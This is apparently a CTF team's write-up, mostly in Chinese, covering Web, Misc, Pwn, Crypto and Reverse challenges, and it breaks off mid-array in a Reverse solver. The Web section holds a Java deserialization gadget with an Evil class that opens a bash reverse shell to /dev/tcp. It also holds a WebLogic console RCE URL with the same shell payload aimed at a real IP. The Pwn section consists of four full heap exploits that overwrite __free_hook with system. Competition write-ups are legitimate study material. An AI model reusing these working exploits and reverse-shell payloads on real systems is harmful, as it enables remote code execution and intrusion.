Web
Ezgadget
import com.ezgame.ctf.tools.ToStringBean;
import com.sun.corba.se.spi.ior.ObjectKey;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;
public class Gadget {
public static void main(String[] args) {
try {
ToStringBean payload = new ToStringBean();
File clzFile = new File("C:\\Users\\Eki\\Projects\\learn-memshell\\Test\\target\\classes\\Evil.class");
byte[] clzBytes = new byte[(int) clzFile.length()];
FileInputStream fis = new FileInputStream(clzFile);
fis.read(clzBytes); //read file into bytes[]
fis.close();
payload.setClassByte(clzBytes);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder");
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, payload);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
out.writeUTF("gadgets");
out.writeInt(2021);
out.writeObject(badAttributeValueExpException);
//String data = byteArrayOutputStream.toString();
String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());
System.out.println(data);
/*
byte[] b = Tools.base64Decode(data);
InputStream inputStream = new ByteArrayInputStream(b);
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
String name = objectInputStream.readUTF();
int year = objectInputStream.readInt();
if (name.equals("gadgets") && year == 2021) {
objectInputStream.readObject();
}*/
}catch (Exception e){
e.printStackTrace();
}
}
}
public class Evil {
static{
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/xxx/9855 0>&1"});
p.waitFor();
}catch (Exception e){
e.printStackTrace();
}
}
}
apacheProxy
apachesockscve SSRF
weblogice
http://47.104.90.78:7410/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(new+String[]{%22/bin/bash%22,%22-c%22,%22bash+-i+%3E%26+/dev/tcp/xxx/9855+0%3E%261%22});%22);
Misc
checkin
UTF-7,base64解码一下就出
project
有用的只有一个test.exe
里面邮件正常解密得到密钥hurryup
还有一个图片,图片后面9e97ba2a
从前段pwnhub比赛中知道是oursecret特征,放进去解密得到flag
jumpjumptiger
反编译exe发现一堆base64。
提取出来结合题目名字,来跳着取字符,得到一个png一个jpg
file=open('a.txt','r')
tot=0
data=''
import base64
for line in file:
if tot<3:
#data=line.encode('utf-8')
data+=line[:-1]
tot+=1
jpg_file=''
png_file=''
for i in range(0,len(data)):
if i%2==1:
jpg_file+=data[i]
else:
png_file+=data[i]
file_j=open('jpg.txt','w')
file_j.write(jpg_file)
file_p=open('png.txt','w')
file_p.write(png_file)
双图盲水印 得到flag
where_can_code_found
我们可以发现asc也可以通过WbStego4.3进行解密
空密码得到了云影密码,得到BINGO。通过
Translate J into I 我们可以想到 playfair密码。那么BINGO也就是这个的密钥
利用这个来解密即可
tihuan='FLAGDAFDADDEEDCDBF'
flag='dpeb{e58ca5e2-2c51-4eef-5f5e-33539364deoa}'
ok='1234567890-{}'
tot=0
result=''
for i in flag:
if i not in ok:
result+=chr(ord(tihuan[tot])+32)
tot+=1
else:
result+=i
print(result)
得到flag
Pwn
cpp1
堆溢出,改size泄露libc,堆重叠打free_hook
# -*- coding: UTF-8 -*-
from pwn import *
context(os='linux',arch='amd64')
elf = ELF("./pwn")
libc = ELF('./libc-2.31.so')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
loacl = 0
context.log_level = 'debug'
if loacl:
p = process("./pwn")
else:
p = remote("47.104.143.202", "43359")
def choice(cmd):
p.sendlineafter("4. Delete A Vuln\n>>",str(cmd))
def add(idx,size):
choice(1)
p.sendlineafter("I:>>",str(idx))
p.sendlineafter("S:>>",str(size))
def edit(idx,data):
choice(2)
p.sendlineafter("I:>>",str(idx))
p.sendlineafter("V:>>",data)
def show(idx):
choice(3)
p.sendlineafter("I:>>",str(idx))
def free(idx):
choice(4)
p.sendlineafter("I:>>",str(idx))
add(0,0xF0)
add(1,0xF0)
add(2,0xF0)
add(3,0xF0)
add(4,0xF0)
add(5,0xF0)
add(6,0xF0)
edit(0,"a"*0xF8+p64(0x501))
free(1)
add(1,0xF0)
show(2)
addr = u64(p.recvuntil('\x7f').ljust(8,'\x00')) >> 8
libc_base = addr-96-libc.sym['__malloc_hook']-0x10
print hex(addr)
add(7,0xF0)
add(8,0xF0)
add(9,0xF0)
add(10,0xF0)
free(9)
free(8)
edit(7,'b'*0xF8+p64(0x101)+p64(libc_base+libc.sym['__free_hook']))
add(11,0xF0)
edit(11,"/bin/sh\x00")
add(9,0xF0)
edit(9,p64(libc_base+libc.sym['system']))
free(11)
# gdb.attach(p)
p.interactive()
# flag{96f7801e4e658271915cf5ab3aa26ee6}
gcc2
UAF改size构造unsortedbin,泄露libc打free_hook
# -*- coding: UTF-8 -*-
from pwn import *
context(os='linux',arch='amd64')
elf = ELF("./pwn")
libc = ELF('./libc-2.31.so')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
loacl = 0
context.log_level = 'debug'
if loacl:
p = process("./pwn")
else:
p = remote("47.104.143.202", "15348")
def choice(cmd):
p.sendlineafter("4. Delete A Vuln\n>>",str(cmd))
def add(idx,size):
choice(1)
p.sendlineafter("I:>>",str(idx))
p.sendlineafter("S:>>",str(size))
def edit(idx,data):
choice(2)
p.sendlineafter("I:>>",str(idx))
p.sendlineafter("V:>>",data)
def show(idx):
choice(3)
p.sendlineafter("I:>>",str(idx))
def free(idx):
choice(4)
p.sendlineafter("I:>>",str(idx))
add(0,0x60)
add(1,0x60)
add(2,0x60)#0x71==0x461
add(3,0x60)#0x71
add(4,0x60)#0x71
add(5,0x60)#0x71
add(6,0x60)#0x71
add(7,0x60)#0x71
add(8,0x60)#0x71
add(9,0x60)#0x71
add(10,0x60)#0x71
add(11,0x60)#0x71
add(12,0x60)#0x71==
edit(12,"/bin/sh\x00")
free(0)
free(1)
show(1)
heap_addr = u64(p.recvuntil("\x55").ljust(8,'\x00'))>>8
print hex(heap_addr)
addr = heap_addr+0xD0
edit(1,p64(addr))
add(13,0x60)#0x71
add(14,0x60)#0x71
edit(14,p64(0)+p64(0x461))
free(2)
show(2)
addr = u64(p.recvuntil("\x7f").ljust(8,'\x00'))>>8
libc_base = addr-96-libc.sym['__malloc_hook']-0x10
print hex(libc_base)
free(4)
free(5)
edit(5,p64(libc_base+libc.sym['__free_hook']))
add(15,0x60)
add(16,0x60)
edit(16,p64(libc_base+libc.sym['system']))
free(12)
# gdb.attach(p)
p.interactive()
# flag{c9749ef8cbfdc4fc56542daea489a71c}
bg3
size数组没有清空且edit的时候使用”+=”得到chunk的size,多次申请并释放构造堆溢出,泄露libc打free_hook.
# -*- coding: UTF-8 -*-
from pwn import *
context(os='linux',arch='amd64')
elf = ELF("./pwn")
libc = ELF('./libc-2.31.so')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
loacl = 0
context.log_level = 'debug'
if loacl:
p = process("./pwn")
else:
p = remote("47.104.143.202", "25997")
def choice(cmd):
p.sendlineafter("4. Remove A Bug From DataBase\nSelect:",str(cmd))
def add(idx,size):
choice(1)
p.sendlineafter("Index:",str(idx))
p.sendlineafter("Length:",str(size))
def edit(idx,data):
choice(2)
p.sendlineafter("Index:",str(idx))
p.sendlineafter("Info:",data)
def show(idx):
choice(3)
p.sendlineafter("Index:",str(idx))
def free(idx):
choice(4)
p.sendlineafter("Index:",str(idx))
add(0,0x60)
add(1,0x60)#==0x460 [12]
add(2,0x60)#
add(3,0x60)
add(4,0x60)
add(5,0x60)
add(6,0x60)
add(7,0x60)
add(8,0x60)
add(9,0x60)
add(10,0x60)#==0x460
add(11,0x60)
free(0)
add(0,0x60)
edit(0,"a"*0x60+p64(0)+p64(0x461))
free(1)
add(12,0x60)
show(2)
libc_base = u64(p.recvuntil('\x7f').ljust(8,'\x00')) >> 8
libc_base = libc_base-96-libc.sym['__malloc_hook']-0x10
free(0)
add(0,0x60)
free(0)
add(0,0x60)
add(14,0x60)
add(15,0x60)
free(15)
free(14)
edit(0,"a"*0x60+p64(0)*1+p64(0x71)+p64(0)*13+p64(0x71)+p64(libc_base+libc.sym['__free_hook']))
add(14,0x60)
edit(14,"/bin/sh\x00")
add(15,0x60)
edit(15,p64(libc_base+libc.sym['system']))
free(14)
# gdb.attach(p)
p.interactive()
# flag{7240aca686aa4bc4d7697b2d7b5c7655}
boom
数组越界,改size堆溢出泄露libc,然后改fd申请到__free_hook-0x28,申请数组改为system
#!python
#coding:utf-8
from pwn import *
import subprocess, sys, os
from time import sleep
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
elf_path = './boom_script'
ip = '47.104.143.202'
port = 41299
remote_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
LIBC_VERSION = ''
HAS_LD = False
HAS_DEBUG = False
context(os='linux', arch='amd64')
context.log_level = 'debug'
def run(local = 1):
LD_LIBRARY_PATH = './lib/'
LD = LD_LIBRARY_PATH+'ld.so.6'
global elf
global p
if local == 1:
elf = ELF(elf_path, checksec = False)
if LIBC_VERSION:
if HAS_LD:
p = process([LD, elf_path], env={"LD_LIBRARY_PATH": LD_LIBRARY_PATH})
else:
p = process(elf_path, env={"LD_LIBRARY_PATH": LD_LIBRARY_PATH})
else:
p = process(elf_path)
else:
p = remote(ip, port)
def debug(cmdstr=''):
if HAS_DEBUG and LIBC_VERSION:
DEBUG_PATH = '/opt/patchelf/libc-'+LIBC_VERSION+'/x64/usr/lib/debug/lib/x86_64-linux-gnu/'
cmd='source /opt/patchelf/loadsym.py\n'
cmd+='loadsym '+DEBUG_PATH+'libc-'+LIBC_VERSION+'.so\n'
cmdstr=cmd+cmdstr
gdb.attach(p, cmdstr)
pause()
def loadlibc(filename = remote_libc_path):
global libc
libc = ELF(filename, checksec = False)
def one_gadget(filename = remote_libc_path):
return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
def str2int(s, info = '', offset = 0):
if type(s) == int:
s = p.recv(s)
ret = u64(s.ljust(8, '\x00')) - offset
success('%s ==> 0x%x'%(info, ret))
return ret
def chose(idx):
sla('Chose', str(idx))
def add(idx, size, content = '\n'):
chose(1)
sla('Index', str(idx))
sla('Size', str(size))
sa('Content', content)
def edit(idx, content):
chose(2)
sla('Index', str(idx))
sa('Content', content)
def free(idx):
chose(3)
sla('Index', str(idx))
def show(idx):
chose(4)
sla('Index', str(idx))
def com(str):
global payload
payload += str + ';\n'
def add(name, size):
com('{}="{}"'.format(name, size*'a'))
run(0)
# debug('b *0x8002BEB')
payload = '''
function de {{
return 1;
}}
'''
# com('array gank1[1]')
# com('array gank2[1]')
# com('array gank3[1]')
# com('array gank4[1]')
# com('array gank5[1]')
# com('array gank6[1]')
# com('array gank7[1]')
# com('a=1')
# com('bb=1')
# com('chose=1')
# add('leak', 1)
# add('leak2', 1)
# add('leak', 0x100)
# add('leak2', 0x100)
# add('leak', 1)
# com('prints(leak)')
com('array hackarr[1]')
com('hack1="'+'a'*0x70+'"')
com('hack2="'+'a'*0x40+'"')
com('array arr[1]')
com('c="{}"'.format('a'*0x31))
com('d="456"')
com('arr[2]=49')
com('att="{}"'.format('a'*0x500))
com('p1="{}"'.format('a'*0x60))
com('p1="{}"'.format('a'*0x40))
com('p1="{}"'.format('a'*0x100))
com('p1="/bin/sh"')
com('d="{}"'.format('a'*1))
com('att="{}"'.format('a'*1))
com('e="{}"'.format('a'*0x18+'b'*8))
com('prints(e)')
com('hack2="{}"'.format('a'*0x60))
com('inputn(a)')
com('hackarr[3]=a')
com('xxx="{}"'.format('a'*0x40))
com('array final[1]')
com('inputn(a)')
com('final[0]=a')
com('p1="{}"'.format('a'*0x100))
com('de(a)')
sla('$', '1')
sla('length:\n', str(len(payload)))
sa('code:\n', payload)
# p.recvuntil('running...\n')
# heap = str2int(p.recvuntil('\n')[:-1], 'heap', 0x8077461 - 0x8077290)
p.recvuntil('b'*0x8)
loadlibc()
libc.address = str2int(6, 'libc', libc.sym['__malloc_hook']+0x70)
sleep(0.01)
p.sendline(str(libc.sym['__free_hook']-0x28))
# offset = (libc.sym['__free_hook'] - 0x28 - heap)
# for i in range(7):
# if (offset+i*0x50)%0x38 == 0:
# a = (offset+i*0x50)/0x38
# b = libc.sym['system']
# cc = i+1
# break
# sleep(0.01)
# p.sendline(str(a))
# sleep(0.01)
# p.sendline(str(b))
# sleep(0.01)
# p.sendline(str(cc))
sleep(0.01)
p.sendline(str(libc.sym['system']))
p.interactive()
Crypto
The_RSA
common d。算一下界,要6组就可以构造一个格解d了
from Crypto.Util.number import *
from pwn import *
import itertools as its
import string
from hashlib import sha256
ip, port = '47.104.183.8', 58462
# context.log_level = 'debug'
io = remote(ip, port)
io.recvuntil(b'XXXX+')
s = io.recvuntil(b') == ')[:-5]
hc = io.recvuntil(b'\n').strip().decode()
io.recvuntil(b' XXXX :')
words = string.ascii_letters + string.digits
r = its.product(words, repeat=4)
for i in r:
h = sha256((''.join(i).encode() + s)).hexdigest()
if h == hc:
io.sendline(''.join(i).encode())
break
N = []
E = []
C = []
for i in range(6):
io.recvuntil(b'hat do you want to do?\n')
io.sendline(b'1')
e, n, c = eval(io.recvuntil(b'\n').decode().strip()[3:])
N.append(n)
E.append(e)
C.append(c)
io.sendline(b'2')
delta = 435./1024
M = int(sqrt(N[5]))
B = Matrix(ZZ, [ [M, E[0], E[1], E[2], E[3], E[4], E[5]],
[0, -N[0], 0, 0, 0, 0, 0],
[0, 0, -N[1], 0, 0, 0, 0],
[0, 0, 0, -N[2], 0, 0, 0],
[0, 0, 0, 0, -N[3], 0, 0],
[0, 0, 0, 0, 0, -N[4], 0],
[0, 0, 0, 0, 0, 0, -N[5]]])
L = B.LLL()
d = int(L[0][0] / M)
print(d)
for i in range(6):
print(long_to_bytes(pow(C[i], d, N[i])))
block cipher
发现规律 密文差分是明文差分二倍。
选择明文攻击 ez
传一次48字节明文,收到一个密文,再拿一次flag密文
计算flag密文和已知密文差分,除以2,和已知明文异或 就是flag
fermat’s revenge
hintp\equiv 1011^qq\ mod\ n\
q\equiv 1011^qqhint^{-1}\ mod n\
1011^qhint^{-1}= 1+ kp\
费马小定理得,(1011^{p-1}-kp)(1011^qhint^{-1})=tp\
(1011^{n-1}hint^{-1})\%(n-1)=kp
gcd即可
CryptoSystem
hint部分用sage求s,再用费马小定理分解n得到p
from Crypto.Util.number import inverse, long_to_bytes
p = 11704602934176759298266213423114891493824916364795978469364524885399760428906015479407230137777563251525502066790836884862088509654031834827866112229646287
q = 8102629067081196663344380051036364913486884958511293329215799851980156535639525773862943502278622329075523611986041747264662648303657273142937759092732383
N = p * q
param = (94838055953104472310020336849161906597270875083875935416005298095630163598779959260413267847713143964237534199642297293652763137312313661870292629408730403218471443807586408082416986269585654162055563577353421655366755587333747937935478818301644202126262621687419423878277111644527700593904018451376440611921, 8222220570332735331949763152648643878282797014372489167249681610732943758559638292763163612903100016043213373570246365367819395127227607081784918414517609326236531013392638264924887790191415928816964434122789390222670507904271026857201091641296283721697112493387765424655204734684772094363463488547209898317618020210347466934206863781079250288263237602677774540340474214135433352664684289611895081372394132170101657166399519419319057509388402930386023764745405611423456734910055143884558701621843650647393051425844754545495930833842659454191685794067914903168454978809697068321562570292853621020380904691313994605614)
pk_list = [3564554126020601767122284155272940244115500916016690385720248412732293807827407623646169394942033115971886678929792807813266464390660211985312997812329515691706163088814597082151349321353465507174614151445441969371190953327690535213134464187643911325170125446717958555985134293439626833239300029345162925717978071151676511527322942774720259645694753534050935244653861171239044020817096899676384226961132345628523865720523833528694212362621440726964630421257765523134808293386374936416895389512896809663386643328753578557272723069570535659506162276122557173102614609443356563987630989432500797285594919664338771725548, 51949631032466677884668777990481020678624011707837057355490471112729702272480832691255853566519006825061781532550206121975328286788036668106961747512051795567692299712109597841475700846356050296497291275039000765449499726500039624258560686675685497565524045405208520158368584743775151242037524141494259080758524153656665822512005270418521352058653437680515077881459829836376524927212130651643653069458193875067760192379047708213297086044860106167886934476995436190533245156835175098152649119356965433166238098375648549763912220138594204326046368469923059016088650753552409534212180668073391353579591467415787490149, 7986362162025905689231646843334955186263434112251956149464261793941501933787501290327864521855021682488811066081880924979479476227828398154818993276184432317646528325274723812812157654126066449698234094317343864756583199062105112858625759329850627679835473484861288614076796400075479845418499958800738440381114671922155276790365493080496734023502844556676823283705667259707410938168389976063614068996886044918020087684059481349150957896660913638014994456400081162044754080463653541838895680936763809711998377500016788713084589760458829219553832790437896361321347126225712699163293119653230062051692305584870448136781, 5509215895469694413348792868619651606298725002151671067953611964180811460996395169086607883812267265330756971374354016051661555614907459670730827391377556955419648506942552769668103752188785264563836719708904562565395760871051871503662833918521645609484375521558246117207684064040280887682094573323668742331437806345757112769325888710104679453602928017179026121413614201055360020689986219186478012498427895992471540694275566824503335098369079778528444671655093810291648410623186225087794871022199736965535212998572558375484552077908177813824038350860742907421950961985127384482416814578227658638416785748962245352439, 8496539211519908291270238891814138985850458858448358176258096335494263978565038410645728760545519239258839788622699527580123928735756947867908186216355019036081461698526439932842895772667215815571161769376330300506786557148418617625613356337520209443577663597144819464591231136429789085020820633516461255085342249140282172605131301349438939914194791529515027683769376169944474544341419673871048137199438363027021539465707255176263391073672475085240925242765398549550846051893117654286203093128819952079205390072682068591722110732509800859194325896617059125401089781447015715505398175009798381976557063365858810742142, 3119521321597798116564410527295891208645456104060100910111522194458734425455591287735172248550909361509594435828980202549592100379040319465629415595273252574892211076833978936222563685826278814956395123225345328104185454548941642244945706562341832270981273594299024984702484297185231135774151499320150517647084638177642234122468778443225112500830045691341257387684698969412693394273985986695854974792963826574899053511454361023453085928676328028619308765823192567800541796687870557788801872908098337374005435236061927994485526068927129418361391784831965701811151290780330859535341501860848477927126740856918456827291]
flag = [(1895110770974995776327537266248645419592814983548926525437013518755346649444208974302394383159320186478586984380460834297376738215275196908233459414481279510660434502430584946210015761116096559993138033422232322205417089713715792462148266154681511980963196925272212322451769279858886519718456825642066511529164347278255378844543664848230789360929037676499703295348322396452663567275796483693389548472754318913963185293878328106568590355987410084594983497641544456926403558798930063249463637161594034131199943263851641833765484819686520866681950162068025598423696701886851742204509988002349788546319112034075714312163, 8348350425773992988408167765217389425274192139844001852066738270973295915297143283242462996481508118979253393755742191573847006962006274688581781912437955445592262306425613723348411357321599513125881947346990562543878420352203105340933434809655405928444870086324601412608914319751495984719849933372727094414306779574276837370714046686861111546936020579823910332640232854894180523132020562537521197208021210983039338276655307580027934011561533302322216926852401079374537918217126655560305488588948296068120485570362089570563838759123676837800286896529658149159800187475878092705018821811351554640010191745115198926729), (6547809729172062304392126567614144868617944394732518155378084330520068508944823016924954658050454785198615021551772182688199414233011285480747763346302773917450781361120304381787257876610018297816639792744296674246887548754910409019518666210650367859779742855094676737197174544665173860717946678840016688436725882025615620073152140353058810737281150704650761914946976776704231686913452688276252021445545896237250980890065511268183838487390628912637968844991376592402406772430984032171990745811658293576445197144511626491585084413059744980471426546094287632039346409112057840983875817148858666952294956181250461856727, 539528453684836200118955530842589018546029088855716355156500219259690558396330164491918715822444227634675506487994034492800817469832277488578430854174557192595864956557206606826654857835787752369409754557744246335095899973249207055361021399515390376583628070615936281523211356529036166106830676433869682725700717254113750652538046466452260462276415675855317604867243005909900738067651581774120505766957586567542946870640123744588141161010436594403199427052069196656642284825947561364959628812322048378996891488397757980262208271379463477516167028150986793395137095016611002570558674441426374196667515380651984957729), (4869650850425919416572388145326425772638525050861630686643744949656592837549732864690684532415944148101547995272030012523064173428838619508457101402008366457798078556087381468237471902355558394382673722165234880942860179254786165620321427855692724609011739978918256781054578291077961004857146604484714444009523337298690950898549947332439108558434716919454113930269728302628959956631536980830855034437738402400353541776986351148604387691003875703722316937115796400515194605182859646636553735257268146588183361484214839579049722298047072153673443940251998151806354993805797713908029260083838662190617946860551089298943, 7477912295493345893183371250351610156892382750787286524460920943843540549340840785530351906205032267138458823248478655539200869235599834519743117327403731292040268105667149767785329069038244007226784238949734318572364133991058911852783555638852122803877599718608864354211231599109981059447732806535526300211343793104419468619374147853501937286506933491095693771742551510050426543066196576641064623792290518495855220209878655263131455722688600983849900083086004273403349497620372901607922066236440188529960719856024629999714297911192436570687641866490877509997699025253825619385472786733515782407425030437357666752735), (6464727516232552647517501061506933116555314308990921079953837751993642815052207769221099037180506306354359193985109287613843001577101441890246251292357057194252327332285029147137878590311575121375567217071958285290048665289406183977993059776333416404803071125093208575240141621690783046975148663035653967462158779605726760538781734904023609304894799127796425513959758085675576028049993611506807479802949052140092824593347849096382560033934201868677224529604199285187373552841491661731380398866783748630346038796305091917446725093553002844414148870721532404063380447115114632155714121547435395217163756132790416742671, 6850411664195376422025015206118711455689423960379448891788100075660460492264704602269805771393450722446242159327697560772085476860414884516935965530040190362623796801001778234596616473797593170296144184102247592973716496801111195165570133022077886576708739395218886915952502308693203274582997039256664260473505597761567811949858685818888942390299572811059785582141812901034732844688946029036549256354513607106473086010207691771969649836726655229055635019906651333628738473554556488660520478529649528373696986915219562143713043132611075675187178303726985191698014439680680044186462534712096396621223123585558459420608), (6534301014881654707404673876996948839322179804775776198166402518439867813315601790257627516981360792935422027690182974155688806158814828361838521557393132633842885393287083618132390820890550229370087175513804335167215277291646001454117359341327904799219955402894753620724890162571483666292356287731882060888796217553234455417347076014235929438071226485172187184889899875554490425650927577044520045498565491252242739066380153010758764773480636245956149958887681546111115432766828253376921942485117934974672598288151203182541748236665991282944739910595822585505403340465327236160529875561469600273400146032402620778254, 6742462105379692268051835178142047339172529427092119397881803064555921035237781884806727179281323359877963929066017083219523421113234461320428533584688996704275467594541285196512716180625961796315949820908869133790341068665993009154482389241267593244194078836311538380821273504497492996050216549058275732250459768518903549747081450622345060004943485543622323398418505307471458822571948009393008762637305373255750791849250707727735049422531168722372589013783569345380063173149712893149166326061044252126030213920719005474090812886717033703158392986098353386773348092068175880145897600731191143690605750357983433719183), (5990426986098997970818954794603039707504702739722710528441777553622267718742652468716180586265258522973226385541495202947655385191365447432432365094500178009123156691485339968328350333436219311394416230126804951925419830936501110064157997300077429763250083534219761864352597543538198282085471343174927688785494653435499436489275447194656682111521588793398673638067458780511219243399664020715331659228079042025365658003388653304544672647819094163881890397380413581251822121267344979474727881550899581702181772564406911776258773790201004654312336810609038653018905795882079795983978327976054984690490535815381455614257, 8823069339108363748726506971270735400841974924478629831426013975943540746347985519621759355136707318375847077087399141582390004491705082509496101218047679222287289789004545273051737545951071318937120089046135323108334989581340149384250404798117270903737280395538472871233806086323332049381128843913329095059069394096764788511394035193484935857735625769677601168795441300651978953981363233155266673928086194838316342484379551057381607920958594926026280971672115801001160385935285506024128335995610854601196074878804310703463050175734399540885788308476474930479920409797535094302009070658075556086735218614785836017758)]
g = param[1]
p0 = (p - 1) // 2
q0 = (q - 1) // 2
k = (pow(g, p0*q0, N**2) -1) // N
out = b''
msg = [123,456,789,123,456,789]
for i in range(6):
r0 = (((pow(flag[i][0], p0*q0, N**2) - 1) * inverse(k, N**2)) % (N**2)) // N
a0 = (((pow(pk_list[i], p0*q0, N**2) - 1) * inverse(k, N**2)) % (N**2)) // N
m = ((pow(flag[i][1], p0*q0, N**2) -1) // N - k*a0*r0) * inverse(p0*q0, N) % N
out += long_to_bytes(m - msg[i])
print(out)
Reverse
Hello
主要逻辑在so
先是将输入异或(签名的值 + i)
之后高三位和低五位互换位置
最后比较,通过动调获取sign值,写exp
#include <stdio.h>
int main()
{
int i, j;
unsigned char sign[] =
{
0x33, 0x30, 0x38, 0x32, 0x30, 0x32, 0x65, 0x34, 0x33, 0x30,
0x38, 0x32, 0x30, 0x31, 0x63, 0x63, 0x30, 0x32, 0x30, 0x31,
0x30, 0x31, 0x33, 0x30, 0x30, 0x64, 0x30, 0x36, 0x30, 0x39,
0x32, 0x61, 0x38, 0x36, 0x34, 0x38, 0x38, 0x36, 0x66, 0x37,
0x30, 0x64, 0x30, 0x31, 0x30, 0x31, 0x30, 0x35, 0x30, 0x35,
0x30, 0x30, 0x33, 0x30, 0x33, 0x37, 0x33, 0x31, 0x31, 0x36,
0x33, 0x30, 0x31, 0x34, 0x30, 0x36, 0x30, 0x33, 0x35, 0x35,
0x30, 0x34, 0x30, 0x33, 0x30, 0x63, 0x30, 0x64, 0x34, 0x31,
0x36, 0x65, 0x36, 0x34, 0x37, 0x32, 0x36, 0x66, 0x36, 0x39,
0x36, 0x34, 0x32, 0x30, 0x34, 0x34, 0x36, 0x35, 0x36, 0x32,
0x37, 0x35, 0x36, 0x37, 0x33, 0x31, 0x31, 0x30, 0x33, 0x30,
0x30, 0x65, 0x30, 0x36, 0x30, 0x33, 0x35, 0x35, 0x30, 0x34,
0x30, 0x61, 0x30, 0x63, 0x30, 0x37, 0x34, 0x31, 0x36, 0x65,
0x36, 0x34, 0x37, 0x32, 0x36, 0x66, 0x36, 0x39, 0x36, 0x34,
0x33, 0x31, 0x30, 0x62, 0x33, 0x30, 0x30, 0x39, 0x30, 0x36,
0x30, 0x33, 0x35, 0x35, 0x30, 0x34, 0x30, 0x36, 0x31, 0x33,
0x30, 0x32, 0x35, 0x35, 0x35, 0x33, 0x33, 0x30, 0x32, 0x30,
0x31, 0x37, 0x30, 0x64, 0x33, 0x32, 0x33, 0x31, 0x33, 0x30,
0x33, 0x33, 0x33, 0x30, 0x33, 0x36, 0x33, 0x31, 0x33, 0x34,
0x33, 0x33, 0x33, 0x30, 0x33, 0x34, 0x33, 0x38, 0x35, 0x61,
0x31, 0x38, 0x30, 0x66, 0x33, 0x32, 0x33, 0x30, 0x33, 0x35,
0x33, 0x31, 0x33, 0x30, 0x33, 0x32, 0x33, 0x32, 0x33, 0x37,
0x33, 0x31, 0x33, 0x34, 0x33, 0x33, 0x33, 0x30, 0x33, 0x34,
0x33, 0x38, 0x35, 0x61, 0x33, 0x30, 0x33, 0x37, 0x33, 0x31,
0x31, 0x36, 0x33, 0x30, 0x31, 0x34, 0x30, 0x36, 0x30, 0x33,
0x35, 0x35, 0x30, 0x34, 0x30, 0x33, 0x30, 0x63, 0x30, 0x64,
0x34, 0x31, 0x36, 0x65, 0x36, 0x34, 0x37, 0x32, 0x36, 0x66,
0x36, 0x39, 0x36, 0x34, 0x32, 0x30, 0x34, 0x34, 0x36, 0x35,
0x36, 0x32, 0x37, 0x35, 0x36, 0x37, 0x33, 0x31, 0x31, 0x30,
0x33, 0x30, 0x30, 0x65, 0x30, 0x36, 0x30, 0x33, 0x35, 0x35,
0x30, 0x34, 0x30, 0x61, 0x30, 0x63, 0x30, 0x37, 0x34, 0x31,
0x36, 0x65, 0x36, 0x34, 0x37, 0x32, 0x36, 0x66, 0x36, 0x39,
0x36, 0x34, 0x33, 0x31, 0x30, 0x62, 0x33, 0x30, 0x30, 0x39,
0x30, 0x36, 0x30, 0x33, 0x35, 0x35, 0x30, 0x34, 0x30, 0x36,
0x31, 0x33, 0x30, 0x32, 0x35, 0x35, 0x35, 0x33, 0x33, 0x30,
0x38, 0x32, 0x30, 0x31, 0x32, 0x32, 0x33, 0x30, 0x30, 0x64,
0x30, 0x36, 0x30, 0x39, 0x32, 0x61, 0x38, 0x36, 0x34, 0x38,
0x38, 0x36, 0x66, 0x37, 0x30, 0x64, 0x30, 0x31, 0x30, 0x31,
0x30, 0x31, 0x30, 0x35, 0x30, 0x30, 0x30, 0x33, 0x38, 0x32,
0x30, 0x31, 0x30, 0x66, 0x30, 0x30, 0x33, 0x30, 0x38, 0x32,
0x30, 0x31, 0x30, 0x61, 0x30, 0x32, 0x38, 0x32, 0x30, 0x31,
0x30, 0x31, 0x30, 0x30, 0x63, 0x62, 0x66, 0x32, 0x62, 0x30,
0x39, 0x65, 0x34, 0x33, 0x30, 0x38, 0x65, 0x62, 0x62, 0x34,
0x35, 0x39, 0x65, 0x38, 0x38, 0x34, 0x31, 0x65, 0x35, 0x61,
0x37, 0x62, 0x39, 0x32, 0x30, 0x34, 0x39, 0x37, 0x66, 0x65,
0x66, 0x32, 0x62, 0x33, 0x34, 0x39, 0x65, 0x38, 0x30, 0x36,
0x34, 0x38, 0x66, 0x37, 0x65, 0x62, 0x33, 0x35, 0x66, 0x34,
0x38, 0x64, 0x34, 0x30, 0x61, 0x37, 0x35, 0x65, 0x37, 0x63,
0x65, 0x37, 0x39, 0x34, 0x35, 0x62, 0x38, 0x62, 0x34, 0x32,
0x64, 0x31, 0x39, 0x37, 0x62, 0x65, 0x63, 0x30, 0x62, 0x66,
0x31, 0x37, 0x37, 0x65, 0x36, 0x63, 0x39, 0x38, 0x39, 0x39,
0x65, 0x64, 0x37, 0x30, 0x37, 0x64, 0x63, 0x63, 0x34, 0x61,
0x37, 0x32, 0x36, 0x63, 0x62, 0x31, 0x34, 0x63, 0x31, 0x61,
0x36, 0x39, 0x62, 0x30, 0x63, 0x34, 0x61, 0x30, 0x32, 0x34,
0x37, 0x34, 0x38, 0x30, 0x36, 0x66, 0x61, 0x37, 0x33, 0x63,
0x66, 0x62, 0x31, 0x30, 0x65, 0x31, 0x30, 0x66, 0x37, 0x62,
0x31, 0x36, 0x36, 0x35, 0x30, 0x32, 0x31, 0x63, 0x32, 0x34,
0x37, 0x36, 0x32, 0x62, 0x36, 0x65, 0x64, 0x61, 0x64, 0x36,
0x35, 0x63, 0x61, 0x36, 0x33, 0x63, 0x65, 0x61, 0x33, 0x63,
0x37, 0x32, 0x65, 0x30, 0x64, 0x34, 0x65, 0x34, 0x63, 0x61,
0x33, 0x66, 0x39, 0x38, 0x33, 0x30, 0x31, 0x31, 0x37, 0x33,
0x65, 0x65, 0x63, 0x33, 0x32, 0x35, 0x34, 0x33, 0x33, 0x37,
